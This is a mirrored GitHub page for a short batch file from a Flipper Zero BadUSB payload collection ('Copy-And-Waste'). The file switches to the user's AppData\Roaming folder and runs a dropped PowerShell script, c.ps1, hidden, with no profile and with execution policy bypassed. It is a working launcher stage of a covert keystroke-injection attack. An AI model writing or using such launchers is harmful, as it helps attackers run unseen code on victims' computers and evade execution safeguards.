1
0
mirror of https://github.com/UberGuidoZ/Flipper.git synced 2025-01-03 20:30:19 +00:00
Flipper/BadUSB/Copy-And-Waste/I.bat

4 lines
136 B
Batchfile
Raw Normal View History

2022-09-17 20:03:33 +00:00
@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause